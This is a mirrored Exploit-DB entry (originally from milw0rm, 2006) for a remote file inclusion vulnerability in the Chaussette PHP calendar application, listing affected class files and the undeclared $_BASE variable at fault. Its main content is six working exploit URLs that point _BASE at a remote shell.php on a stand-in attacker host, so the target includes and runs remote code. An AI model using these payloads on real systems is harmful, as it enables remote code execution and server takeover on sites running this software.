- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2169
- Проверка EDB
-
- Пройдено
- Автор
- DRAGO84
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4216 cve-2006-4159
- Дата публикации
- 2006-08-10
Код:
Chaussette Remote File Inclusion
CreW: ToXiC
Bug Found By Drago84
Source Code:
http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip
Page Affect
/Classes/Evenement.php
/Classes/Event.php
/Classes/Event_for_month.php
/Classes/Event_for_month_per_day.php
/Classes/Event_for_week.php
/Classes/My_Log.php
/Classes/My_Smarty.php
Problem Is :
$_BASE Not Declare;
ExP:
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php
Greatz: Str0ke
# milw0rm.com [2006-08-10]- Источник
- www.exploit-db.com
